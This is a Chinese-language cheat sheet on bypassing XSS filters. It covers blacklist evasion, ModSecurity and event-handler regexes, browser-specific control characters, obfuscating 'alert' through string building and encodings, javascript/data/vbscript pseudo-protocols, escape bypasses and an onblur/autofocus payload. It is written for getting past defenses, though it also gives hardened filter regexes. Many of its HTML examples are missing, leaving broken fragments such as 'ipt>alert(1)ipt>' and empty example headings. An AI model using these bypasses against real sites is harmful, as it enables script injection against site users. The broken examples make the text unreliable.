XSS过滤器绕过总结

黑名单过滤器绕过

黑名单模式下的过滤器是最常见的。他们的目标是检测特定模式并防止恶意行为。这完全是“模式”的问题，它们越准确，就越可以拦截攻击。

1. 注入脚本代码

主要是

1.1 绕过弱

简单的过滤器无法涵盖所有可能的情况，所以可以绕开它们。 以下示例仅是对弱规则的一些绕过。

#大写和小写字符

#标签后加随机字符串

ipt>alert(1)ipt> #嵌套标签(双写)

alert(1) #NULL字节

1.2 ModSecurity > 基于标签的XSS向量规则

这是ModSecurity过滤

SecRule ARGS "(?i)(

显然，我们插入脚本代码方法不是唯一的。 有多种方法可以运行我们的代码，例如不同的HTML标签和相关的事件。

1.3 除

show

sendsend

#可使用https://github.com/evilcos/xss.swf

1.4 除

事件是访问者与HTML DOM之间交互性的方式； 这只需通过执行客户端代码(JavaScript)来实现。

几乎所有事件处理程序标识符都以on开头，后跟事件名称。 最常用的一种是onerror，

常用On事件

onsearch

onwebkitanimationend

onwebkitanimationiteration

onwebkitanimationstart

onwebkittransitionend

onabort

onblur

oncancel

oncanplay

oncanplaythrough

onchange

onclick

onclose

oncontextmenu

oncuechange

ondblclick

ondrag

ondragend

ondragenter

ondragleave

ondragover

ondragstart

ondrop

ondurationchange

onemptied

onended

onerror

onfocus

onformdata

oninput

oninvalid

onkeydown

onkeypress

onkeyup

onload

onloadeddata

onloadedmetadata

onloadstart

onmousedown

onmouseenter

onmouseleave

onmousemove

onmouseout

onmouseover

onmouseup

onmousewheel

onpause

onplay

onplaying

onprogress

onratechange

onreset

onresize

onscroll

onseeked

onseeking

onselect

onstalled

onsubmit

onsuspend

ontimeupdate

ontoggle

onvolumechange

onwaiting

onwheel

onauxclick

ongotpointercapture

onlostpointercapture

onpointerdown

onpointermove

onpointerup

onpointercancel

onpointerover

onpointerout

onpointerenter

onpointerleave

onselectstart

onselectionchange

onanimationend

onanimationiteration

onanimationstart

ontransitionend

onafterprint

onbeforeprint

onbeforeunload

onhashchange

onlanguagechange

onmessage

onmessageerror

onoffline

ononline

onpagehide

onpageshow

onpopstate

onrejectionhandled

onstorage

onunhandledrejection

onunload

以下是一些HTML 4标签示例：

以下是一些HTML 5标签示例：

从防御的角度来看，解决此问题方案是过滤所有以on开头的事件，防止XSS。

这是一个被广泛使用的正则表达式(on\w+\s*=)

由于HTML和浏览器“动态性”的结合，我们可以轻松绕过这个过滤器：

因此有了“升级”版过滤器：(?i)([\s\"'`;\/0-9\=]+on\w+\s*=)

但是仍然存在问题。 某些浏览器将一些特殊字符转换为空格，因此\ s元字符不足以覆盖所有可能的字符。

例如以下的一些绕过方法：

#适用于除Safari以外的所有浏览器

#只适用IE

在事件名称(例如onload)和等号(=)字符之间或在事件名称之前可用的控制字符列表，

IExplorer = [0x09,0x0B,0x0C,0x20,0x3B]

Chrome = [0x09,0x20,0x28,0x2C,0x3B]

Safari = [0x2C,0x3B]

FireFox = [0x09,0x20,0x28,0x2C,0x3B]

Opera = [0x09,0x20,0x2C,0x3B]

Android = [0x09,0x20,0x28,0x2C,0x3B]

迄今为止，有效防守的正则表达式规则应为：

(?i)([\s\"'`;\/0-9\=\x00\x09\0A\x0B\x0C\0x0D\x3B\x2C\x28\x3B]+on\w+[\s\x00\x09\0A\x0B\x0C\0x0D\x3B\x2C\x28\x3B]*?=)

一些过滤器可能会阻止某些关键字的使用来阻止脚本代码的执行，例如：alert，javascript，eval等。

alert() 可尝试使用一下方法进行绕过

top['ale'+'rt']()

a\u006cert()

alert``

top['a\u006ce'+'rt']``

2. 字符编码

JavaScript允许使用各种字符编码类型，这些类型使我们能够执行代码，而不是被解释为文字形式。

2.1 Unicode

alert 会被拦截

可使用Unicode编码绕过

2.2十进制，八进制，十六进制

则除了Unicode外，我们还可以采用多种编码

同时可使用多种编码

2.3 构造字符串

通常alert关键字被阻止，但是很可能未检测到“ ale” +“ rt”。

JavaScript具有一些可用于创建字符串的函数。

/ale/.source+/rt/.source

String.fromCharCode(97,108,101,114,116)

atob("YWxlcnQ=")

17795081..toString(36)

2.4 伪协议

javascript：不需要事件处理； 因此，我们应该避免使用它。由于伪协议通常是在字符串中引入的，因此我们可以使用之前看到的所有变体。

data="javascript:alert(1)">

除了javascript还有vbscript 、data。

data:[][;base64],

prettyprint lang-js

prettyprint lang-js

vbscript伪协议不是很常见，因为它只能在Internet Explorer上使用。

#适用IE8

#适用IE8

#适用IE Edge

#适用IE Edge

其他绕过

1. 删除HTML标签

安全机制通常选择对潜在的XSS向量进行清理，而不是阻塞整个请求。 这些可能是我们在测试过程中可能遇到的最常见的过滤器。

例如，最常见的是对一些关键字符进行HTML编码，例如 < (<), > (>)等。这并不总是足够的，并且取决于不可信数据在页面的哪一点被注入。

在某些情况下，过滤器可能会删除恶意关键字。 例如，删除

此行为的一个常见错误是该规则仅删除匹配表达式的第一个实例。

ipt>alert(1)

此外，如果过滤器执行递归检查，则应始终检查它是否仍可利用。递归检查可能是按顺序进行的，也许更改插入字符串的顺序可能绕过。

它们以

ipt>alert(1)

2. 转义

这不仅是HTML标记的问题，而且注入点通常位于带引号的字符串内。 通常，过滤器将反斜杠字符(\)放在引号之前，以转义此类字符。

2.1 转义’

还需要转义反斜杠以避免旁路。 例如，假设我们可以在以下代码中控制值randomkey，但是引号已转义：

var key = 'randomkey';

如果我们插入randomkey \'alert(1)而不是randomkey，

这是因为该应用程序将在转换我们的输入时避免使用’, randomkey\\'; alert(1); //

这只会转义反斜杠，从而使我们可以终止字符串并插入alert代码。

String.fromCharCode()可使我们能够从Unicode值序列开始生成字符串。

String.fromCharCode(120,115,9416)

/your string/.source

我们还可以使用unescape方法来转义生成的字符串。 例如，我们可以使用.source技术对字符串进行转义。

unescape(/％78％u0073％73/.source)即使不推荐使用此功能，许多浏览器仍支持该功能。

除此之外，还有decodeURI和encodeURIComponent方法。 在这种情况下，需要对字符进行URL编码，以避免URI格式错误。

decodeURI(/alert(%22xss%22)/.source)

decodeURIComponent(/alert(%22xss%22)/.source)

2.2 转义括号

括号是调用函数和传递参数的基础。 如果一个潜在的过滤器删除了我们插入的payload中的所有括号，我们应该怎么做？ 有一种在不带括号的情况下将参数传递给函数的方法。

该技术滥用了作为窗口对象一部分的onerror处理程序，一旦使用throw和分配给该错误处理程序的函数的参数生成了错误，就为该函数分配了要调用的函数。

Other

Input 标签 z-index为-1

z-index 属性设置元素的堆叠顺序。拥有更高堆叠顺序的元素总是会处于堆叠顺序较低的元素的前面。

input 标签 会被 a 标签遮挡 无法触发XSS漏洞

adasdsa

onblur 事件会在对象失去焦点时发生。

payload:

οnblur=alert(/Test/) autofocus